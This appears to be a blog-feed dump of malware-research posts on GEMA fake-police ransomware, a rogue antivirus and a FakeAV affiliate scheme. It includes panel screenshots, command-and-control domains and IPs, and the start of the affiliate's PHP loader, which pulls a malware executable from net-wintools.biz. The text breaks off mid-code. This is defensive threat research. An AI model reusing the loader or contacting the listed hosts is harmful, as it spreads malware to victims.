href="http://4.bp.blogspot.com/-kNX712nXOHs/T1vaGdFDgTI/AAAAAAAAFlQ/BvzQ8GTg8O0/s1600/10-03-2012+23-46-26.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="82" src="http://4.bp.blogspot.com/-kNX712nXOHs/T1vaGdFDgTI/AAAAAAAAFlQ/BvzQ8GTg8O0/s400/10-03-2012+23-46-26.png" width="400" /></a></div><br />Some templates:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6lPl1WFsJhg/T1vYl14vuNI/AAAAAAAAFkw/iW-ynxXlya4/s1600/GEMADE.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="http://2.bp.blogspot.com/-6lPl1WFsJhg/T1vYl14vuNI/AAAAAAAAFkw/iW-ynxXlya4/s400/GEMADE.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-4BAagv2-u8c/T1vYxSBKNEI/AAAAAAAAFk4/gwyhQ_XxZ8k/s1600/GEMAFR.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="363" src="http://4.bp.blogspot.com/-4BAagv2-u8c/T1vYxSBKNEI/AAAAAAAAFk4/gwyhQ_XxZ8k/s400/GEMAFR.png" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-6vINeu7YI7o/T1vY7k-lU8I/AAAAAAAAFlA/h3_phwDQFRY/s1600/GEMAUK.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="345" src="http://2.bp.blogspot.com/-6vINeu7YI7o/T1vY7k-lU8I/AAAAAAAAFlA/h3_phwDQFRY/s400/GEMAUK.png" width="400" /></a></div><br />'Admin panel':<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-1PxNA2-ests/T1vKgSLXigI/AAAAAAAAFi4/nQZHA5LqCu8/s1600/10-03-2012+22-37-23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="http://3.bp.blogspot.com/-1PxNA2-ests/T1vKgSLXigI/AAAAAAAAFi4/nQZHA5LqCu8/s400/10-03-2012+22-37-23.png" width="361" /></a></div><br />Debited PSC found (1985€):<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Wq68N9hHK_c/T1vG8xjIUCI/AAAAAAAAFfI/dfKPI5dFncg/s1600/victim1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://2.bp.blogspot.com/-Wq68N9hHK_c/T1vG8xjIUCI/AAAAAAAAFfI/dfKPI5dFncg/s400/victim1.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-z85l0PnqPtM/T1vG98APJCI/AAAAAAAAFfQ/Al9HIk03KcI/s1600/victim10.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://1.bp.blogspot.com/-z85l0PnqPtM/T1vG98APJCI/AAAAAAAAFfQ/Al9HIk03KcI/s400/victim10.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-Xze7WvLpnnQ/T1vG-v7OQ-I/AAAAAAAAFfU/r4Ihl5ObEB8/s1600/victim11.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://1.bp.blogspot.com/-Xze7WvLpnnQ/T1vG-v7OQ-I/AAAAAAAAFfU/r4Ihl5ObEB8/s400/victim11.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-GW70quB6cCM/T1vG_HujUoI/AAAAAAAAFfc/w4DP3DkiybE/s1600/victim12.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://2.bp.blogspot.com/-GW70quB6cCM/T1vG_HujUoI/AAAAAAAAFfc/w4DP3DkiybE/s400/victim12.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-BE98mxtJ_F4/T1vG_y5WAVI/AAAAAAAAFfo/wczn6n86c8U/s1600/victim13.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://2.bp.blogspot.com/-BE98mxtJ_F4/T1vG_y5WAVI/AAAAAAAAFfo/wczn6n86c8U/s400/victim13.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-En5j2f6v9dI/T1vHA0vsvcI/AAAAAAAAFfs/cq_ewgDveIU/s1600/victim14.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://3.bp.blogspot.com/-En5j2f6v9dI/T1vHA0vsvcI/AAAAAAAAFfs/cq_ewgDveIU/s400/victim14.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-dInLquA9Qws/T1vHBb1kVrI/AAAAAAAAFf0/HLxfs3Xaqxk/s1600/victim15.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://2.bp.blogspot.com/-dInLquA9Qws/T1vHBb1kVrI/AAAAAAAAFf0/HLxfs3Xaqxk/s400/victim15.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-n_S6mND_LHE/T1vHCP4QxJI/AAAAAAAAFf8/DZ6SyTlUsnY/s1600/victim16.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://3.bp.blogspot.com/-n_S6mND_LHE/T1vHCP4QxJI/AAAAAAAAFf8/DZ6SyTlUsnY/s400/victim16.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-dz8ZOVVKUx4/T1vHCj7RO4I/AAAAAAAAFgE/qFqmjP4gSU0/s1600/victim18.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://2.bp.blogspot.com/-dz8ZOVVKUx4/T1vHCj7RO4I/AAAAAAAAFgE/qFqmjP4gSU0/s400/victim18.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/--5epUuZsRKU/T1vHDSgDz7I/AAAAAAAAFgM/55SC--737Cs/s1600/victim19.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://4.bp.blogspot.com/--5epUuZsRKU/T1vHDSgDz7I/AAAAAAAAFgM/55SC--737Cs/s400/victim19.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-qrLidUy4DEs/T1vHEBeUw5I/AAAAAAAAFgU/G4KPM-WRqZ8/s1600/victim2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://3.bp.blogspot.com/-qrLidUy4DEs/T1vHEBeUw5I/AAAAAAAAFgU/G4KPM-WRqZ8/s400/victim2.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-1PEIRpINoqQ/T1vHEvN24MI/AAAAAAAAFgc/YDNWtHJd5h8/s1600/victim20.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://4.bp.blogspot.com/-1PEIRpINoqQ/T1vHEvN24MI/AAAAAAAAFgc/YDNWtHJd5h8/s400/victim20.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ghOgaLVS6zY/T1vHFWhYsfI/AAAAAAAAFgk/E65_YYEwd_k/s1600/victim21.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://2.bp.blogspot.com/-ghOgaLVS6zY/T1vHFWhYsfI/AAAAAAAAFgk/E65_YYEwd_k/s400/victim21.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-h60k8VZEe8Q/T1vHGMtLmaI/AAAAAAAAFgw/eP3X6wr7auA/s1600/victim22.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://2.bp.blogspot.com/-h60k8VZEe8Q/T1vHGMtLmaI/AAAAAAAAFgw/eP3X6wr7auA/s400/victim22.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3xRhYZbMZOM/T1vHHujt6zI/AAAAAAAAFg0/pk-BgacOGHA/s1600/victim3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://1.bp.blogspot.com/-3xRhYZbMZOM/T1vHHujt6zI/AAAAAAAAFg0/pk-BgacOGHA/s400/victim3.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-xhePRGxUztA/T1vHIanQ4eI/AAAAAAAAFg8/uwIskqsz1I4/s1600/victim30.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://4.bp.blogspot.com/-xhePRGxUztA/T1vHIanQ4eI/AAAAAAAAFg8/uwIskqsz1I4/s400/victim30.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-aLq-AST4lR4/T1vHJF5dRII/AAAAAAAAFhE/EmZS1cdfgKE/s1600/victim4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://3.bp.blogspot.com/-aLq-AST4lR4/T1vHJF5dRII/AAAAAAAAFhE/EmZS1cdfgKE/s400/victim4.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-DWO6ausbvzc/T1vHJiaG2xI/AAAAAAAAFhM/bCV-rFCW3TU/s1600/victim5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://1.bp.blogspot.com/-DWO6ausbvzc/T1vHJiaG2xI/AAAAAAAAFhM/bCV-rFCW3TU/s400/victim5.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-lXRDWKJsCkg/T1vHKXpCPqI/AAAAAAAAFhY/D_zg2BnmkUA/s1600/victim6.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="http://3.bp.blogspot.com/-lXRDWKJsCkg/T1vHKXpCPqI/AAAAAAAAFhY/D_zg2BnmkUA/s400/victim6.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-8E_oPyI7DCE/T1vHLCymHlI/AAAAAAAAFhc/D2T3M-zNgok/s1600/victim7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://1.bp.blogspot.com/-8E_oPyI7DCE/T1vHLCymHlI/AAAAAAAAFhc/D2T3M-zNgok/s400/victim7.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-KXhUPPuEIow/T1vHMICemyI/AAAAAAAAFhk/sTq12RO3B44/s1600/victim8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://3.bp.blogspot.com/-KXhUPPuEIow/T1vHMICemyI/AAAAAAAAFhk/sTq12RO3B44/s400/victim8.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Mr6e8QizjM0/T1vHM72LTcI/AAAAAAAAFhw/tkJ9T4tGt34/s1600/victim9.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="178" src="http://2.bp.blogspot.com/-Mr6e8QizjM0/T1vHM72LTcI/AAAAAAAAFhw/tkJ9T4tGt34/s400/victim9.PNG" width="400" /></a></div><br />PSC not yet debited: (700€) <br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-nJWsfjJ0nZo/T1vHnVzwgWI/AAAAAAAAFh4/JWrZnOnaOwE/s1600/victim17_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="http://4.bp.blogspot.com/-nJWsfjJ0nZo/T1vHnVzwgWI/AAAAAAAAFh4/JWrZnOnaOwE/s400/victim17_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-EPyDy9uOdR8/T1vHoOFo2AI/AAAAAAAAFh8/CHe-sYKV8TE/s1600/victim23_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://3.bp.blogspot.com/-EPyDy9uOdR8/T1vHoOFo2AI/AAAAAAAAFh8/CHe-sYKV8TE/s400/victim23_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-N1AVc1FNzUQ/T1vHoix3N5I/AAAAAAAAFiE/9I9TUvIzqDI/s1600/victim24_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-N1AVc1FNzUQ/T1vHoix3N5I/AAAAAAAAFiE/9I9TUvIzqDI/s400/victim24_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-5nSGxvo-qbA/T1vHpOMZi_I/AAAAAAAAFiM/2TWi2Bvs4I0/s1600/victim25_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://2.bp.blogspot.com/-5nSGxvo-qbA/T1vHpOMZi_I/AAAAAAAAFiM/2TWi2Bvs4I0/s400/victim25_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-9QNs3uPIDaI/T1vHqDTrLqI/AAAAAAAAFiU/WGLTAoABMpc/s1600/victim26_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://3.bp.blogspot.com/-9QNs3uPIDaI/T1vHqDTrLqI/AAAAAAAAFiU/WGLTAoABMpc/s400/victim26_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-b00NKZHjrZc/T1vHqxgL0_I/AAAAAAAAFic/zIJQ_E4dKrE/s1600/victim27_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="357" src="http://3.bp.blogspot.com/-b00NKZHjrZc/T1vHqxgL0_I/AAAAAAAAFic/zIJQ_E4dKrE/s400/victim27_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-sFWU_s8lt98/T1vHsCj_8lI/AAAAAAAAFiw/jN8YA-Ur3iw/s1600/victim29_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://3.bp.blogspot.com/-sFWU_s8lt98/T1vHsCj_8lI/AAAAAAAAFiw/jN8YA-Ur3iw/s400/victim29_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-YGDSi3Y8P7o/T1vjmFoFiGI/AAAAAAAAFlw/iI5RTXHiBU8/s1600/Victime31_OK.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="http://1.bp.blogspot.com/-YGDSi3Y8P7o/T1vjmFoFiGI/AAAAAAAAFlw/iI5RTXHiBU8/s400/Victime31_OK.PNG" width="400" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-khLAcJ3gRUU/T1xuuPtW0JI/AAAAAAAAFnY/GjMZ807S-nQ/s1600/11-03-2012+10-20-54.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="360" src="http://1.bp.blogspot.com/-khLAcJ3gRUU/T1xuuPtW0JI/AAAAAAAAFnY/GjMZ807S-nQ/s400/11-03-2012+10-20-54.png" width="400" /></a></div><br />Look's like they use bets sites for money laundering.<br />I've sent an email to Paysafecard concerning all these PIN codes, and to some French guys who do investigation in computer fraud.<br />Have fun, stay safe.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-1mHIcZUdYMs/T1vhk3bfbNI/AAAAAAAAFlg/dA6yv9BY0wA/s1600/fma.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="225" src="http://3.bp.blogspot.com/-1mHIcZUdYMs/T1vhk3bfbNI/AAAAAAAAFlg/dA6yv9BY0wA/s400/fma.PNG" width="400" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-6583239920331226513?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/gema-fakepolicealert.htmlnoreply@blogger.com (Steven K)2tag:blogger.com,1999:blog-5365964245877416061.post-4763282444690639538Fri, 09 Mar 2012 16:44:00 +00002012-03-09T17:58:12.321+01:00Best Virus ProtectionfakeavBest Virus Protection<img border="0" src="http://3.bp.blogspot.com/--SgbfniHQE8/T1ouke-MEiI/AAAAAAAAFeo/QhsOzHL54aY/s1600/icon.PNG" /><br /><br />According to <a href="http://siri-urz.blogspot.com/2012/03/best-virus-protection.html">S!Ri</a> (and thanks for the sample)<br /><b>Best Virus Protection</b> is a fake security software (rogue). It replaces: <b>Antimalware PC Safety</b>, <b>Strong Malware Defender</b>, <b>Smart Anti-Malware Protection</b>, <b>Antivirus Smart Protection</b>, <b>Malware Protection Center</b>, <b>Internet Security Guard</b>, <b>Home Security Solutions</b>.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-rm3o93_RI48/T1ouoRlsYLI/AAAAAAAAFew/1hxb_rFCyZg/s1600/Best.Virus.Protection.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://3.bp.blogspot.com/-rm3o93_RI48/T1ouoRlsYLI/AAAAAAAAFew/1hxb_rFCyZg/s400/Best.Virus.Protection.PNG" width="400" /></a></div><br /><span style="font-weight: bold;">Best Virus Protection</span> displays a lot of disturbing warning messages pushing users to purchase a license.<br />To register (and help removal), enter this serial code: <b style="color: red;">OS7L-GMRI-A2EH-TWUJ</b> or <b><span class="Apple-style-span" style="color: red;">U2FD-S2LA-H4KA-UEPB </span></b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-foLxx_jtzgU/T1o2mLTm_3I/AAAAAAAAFfA/F7nrMBgxN_U/s1600/dumping.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="300" src="http://2.bp.blogspot.com/-foLxx_jtzgU/T1o2mLTm_3I/AAAAAAAAFfA/F7nrMBgxN_U/s400/dumping.PNG" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cD0vdfnlDbs/T1ox4FXKUKI/AAAAAAAAFe4/Jn9FfE3KuQQ/s1600/SN.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="70" src="http://4.bp.blogspot.com/-cD0vdfnlDbs/T1ox4FXKUKI/AAAAAAAAFe4/Jn9FfE3KuQQ/s400/SN.PNG" width="400" /></a></div><br />The following urls were found:<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">• dns: 1 » ip: 74.82.198.254 - adresse: WWW5.BESTVIRUS-PROTECTION.COM<br />http://www5.bestvirus-protection.com/?uid=7&amp;mid=54d478139f9a9764baead4fbf8f84bd7&amp;StrWinOS=wvXP&amp;bid=b_Unknown&amp;sid=11110&amp;ls=1&amp;errors=21&amp;nid=0&amp;abbr=BVP&amp;pid=3<br /><br />• dns: 1 » ip: 74.82.198.251 - adresse: SECURE1.SMARTEXB-HOLDER.COM<br />http://secure1.smartexb-holder.com<br /><br />• dns: 1 » ip: 74.82.198.254 - adresse: SECURE2.SAVEVVZARMY.COM<br />http://secure2.savevvzarmy.com</div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5365964245877416061-4763282444690639538?l=www.xylibox.com' alt='' /></div>http://www.xylibox.com/2012/03/best-virus-protection.htmlnoreply@blogger.com (Steven K)1tag:blogger.com,1999:blog-5365964245877416061.post-417434944384553328Fri, 09 Mar 2012 14:34:00 +00002012-03-09T15:36:22.981+01:00Antivirus ProtectionZaxarfakeavAffiliateFakeAV Affiliate who distribute Zaxar FamilyAdvert found in Blackhole<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-JJTTE0uEd0s/T1foirdOIxI/AAAAAAAAFcY/e41VQWvnsMw/s1600/bhadvert.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="http://3.bp.blogspot.com/-JJTTE0uEd0s/T1foirdOIxI/AAAAAAAAFcY/e41VQWvnsMw/s400/bhadvert.PNG" width="400" /></a></div><br />First contact the 24 Feb<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-4o4Snmm5d70/T1fpQqU7NPI/AAAAAAAAFcw/eph6OAlF4hM/s1600/serge.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="288" src="http://1.bp.blogspot.com/-4o4Snmm5d70/T1fpQqU7NPI/AAAAAAAAFcw/eph6OAlF4hM/s400/serge.PNG" width="400" /></a></div><br />Then recontact the 25, 6 and more seriously about business the 7 Mar:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-iCQ0GEeUfBY/T1fopTW05FI/AAAAAAAAFcg/iIlPIz_IT1U/s1600/07-03-2012+19-26-58.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="391" src="http://4.bp.blogspot.com/-iCQ0GEeUfBY/T1fopTW05FI/AAAAAAAAFcg/iIlPIz_IT1U/s400/07-03-2012+19-26-58.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-U4Zvs8d0EVo/T1oJrghnScI/AAAAAAAAFeA/TSo9Ij8SWWQ/s1600/07-03-2012+19-27-24.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="391" src="http://3.bp.blogspot.com/-U4Zvs8d0EVo/T1oJrghnScI/AAAAAAAAFeA/TSo9Ij8SWWQ/s400/07-03-2012+19-27-24.png" width="400" /></a></div><br />9 Mar, loader operational.<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-wzDons3zn6I/T1n_liWCuRI/AAAAAAAAFdw/wA75EvgzeuA/s1600/loader.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="391" src="http://3.bp.blogspot.com/-wzDons3zn6I/T1n_liWCuRI/AAAAAAAAFdw/wA75EvgzeuA/s400/loader.PNG" width="400" /></a></div><br />"Marketing compagny" no name... no logo... look's like a private affiliate.<br /><div class="text" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;">• dns: » ip: 188.72.248.141 - adresse: NET-WINTOOLS.BIZ</div><br />Login:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Y1AeL3_D6uA/T1ffhz9D02I/AAAAAAAAFbY/Gd9ATjRCJoY/s1600/Login.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="248" src="http://3.bp.blogspot.com/-Y1AeL3_D6uA/T1ffhz9D02I/AAAAAAAAFbY/Gd9ATjRCJoY/s400/Login.png" width="400" /></a></div><br />News:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-l9DQzz0z17o/T1fmFhzXFFI/AAAAAAAAFbo/yAcnbJqZ5Qg/s1600/news.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-l9DQzz0z17o/T1fmFhzXFFI/AAAAAAAAFbo/yAcnbJqZ5Qg/s400/news.png" width="400" /></a></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-1nKPq_t6zGE/T1oTBHY18qI/AAAAAAAAFeY/EQCSa2dc8OE/s1600/newspage2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-1nKPq_t6zGE/T1oTBHY18qI/AAAAAAAAFeY/EQCSa2dc8OE/s400/newspage2.PNG" width="400" /></a></div><br />Statistics:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-iVfVFdzHAEU/T1oD6qNN8UI/AAAAAAAAFd4/lTALFNlhzPY/s1600/stats.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-iVfVFdzHAEU/T1oD6qNN8UI/AAAAAAAAFd4/lTALFNlhzPY/s400/stats.PNG" width="400" /></a></div><br />Promo:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-CQGpoIHXG-0/T1fmOjuwL3I/AAAAAAAAFbw/xfCUrfJcWJI/s1600/promo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-CQGpoIHXG-0/T1fmOjuwL3I/AAAAAAAAFbw/xfCUrfJcWJI/s400/promo.png" width="400" /></a></div><br />Statistics by promo:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-So_ON4mjI9Y/T1fmX6kCO1I/AAAAAAAAFb4/_m1LltWuLSs/s1600/stats.by.promo.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://4.bp.blogspot.com/-So_ON4mjI9Y/T1fmX6kCO1I/AAAAAAAAFb4/_m1LltWuLSs/s400/stats.by.promo.png" width="400" /></a></div><br />Payement:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-79crnBpDxRE/T1fmjQVM6AI/AAAAAAAAFcA/KKunepCPLcg/s1600/payement.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://3.bp.blogspot.com/-79crnBpDxRE/T1fmjQVM6AI/AAAAAAAAFcA/KKunepCPLcg/s400/payement.png" width="400" /></a></div><br />Profile:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-8x2IInlnuAY/T1fm0DW_nHI/AAAAAAAAFcI/c4Z6fm4lJQ0/s1600/profile.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://1.bp.blogspot.com/-8x2IInlnuAY/T1fm0DW_nHI/AAAAAAAAFcI/c4Z6fm4lJQ0/s400/profile.png" width="400" /></a></div><br />FAQ:<br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-oaF29Fz5bkg/T1fm7dz4IsI/AAAAAAAAFcQ/MAdpZt0fpHI/s1600/faq.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="250" src="http://2.bp.blogspot.com/-oaF29Fz5bkg/T1fm7dz4IsI/AAAAAAAAFcQ/MAdpZt0fpHI/s400/faq.png" width="400" /></a></div><br />load1.txt:<br /><div class="php" style="background-color: #f0f0f0; border: 1px solid #d0d0d0; color: #000066; font-family: monospace;"><span style="color: black; font-weight: bold;">&lt;?php</span><br /><br /><span style="color: #666666; font-style: italic;">/*<br />&nbsp;* Получает ехе и записывает в файл <br />&nbsp;* <br />&nbsp;*/</span><br /><br /><span style="color: #000088;">$fileName</span><span style="color: #339933;">=</span><span style="color: blue;">"scanner.1"</span><span style="color: #339933;">;</span><br /><span style="color: #000088;">$afid</span><span style="color: #339933;">=</span><span style="color: blue;">"you_afid"</span><span style="color: #339933;">;</span> <span style="color: #666666; font-style: italic;">// 1</span><br /><span style="color: #000088;">$urlActualDomain</span> <span style="color: #339933;">=</span> <span style="color: blue;">"http://net-wintools.biz/promo/domain/?category=1&amp;api_key=[you_api_key]"</span><span style="color: #339933;">;</span><br /><br /><span style="color: #000088;">$actual_domain</span><span style="color: #339933;">=</span><a href="http://www.php.net/file_get_contents" style="color: #000060;"><span style="color: #990000;">file_get_contents</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$urlActualDomain</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><br /><span style="color: #b1b100;">if</span> <span style="color: #009900;">(</span><span style="color: #339933;">!</span><span style="color: #000088;">$actual_domain</span><span style="color: #009900;">)</span> my_error<span style="color: #009900;">(</span><span style="color: blue;">"Can't get domain."</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><span style="color: #000088;">$exe_url</span><span style="color: #339933;">=</span><span style="color: blue;">"http://<span style="color: #006699; font-weight: bold;">$actual_domain</span>/ldpatch/softpatch.php?afid="</span><span style="color: #339933;">.</span><span style="color: #000088;">$afid</span><span style="color: #339933;">;</span><br /><br /><span style="color: #000088;">$baka_exe</span><span style="color: #339933;">=</span><a href="http://www.php.net/file_get_contents" style="color: #000060;"><span style="color: #990000;">file_get_contents</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$exe_url</span><span style="color: #009900;">)</span><span style="color: #339933;">;</span><br /><br /><span style="color: #b1b100;">if</span> <span style="color: #009900;">(</span><a href="http://www.php.net/strlen" style="color: #000060;"><span style="color: #990000;">strlen</span></a><span style="color: #009900;">(</span><span style="color: #000088;">$baka_exe</span><span style="color: #009900;">)</span><span style="color: #339933;">&gt;</span> <span style="color: #cc66cc;">0</span><span style="color: #009900;">)</span><span style="color: #009900;">{</span><br 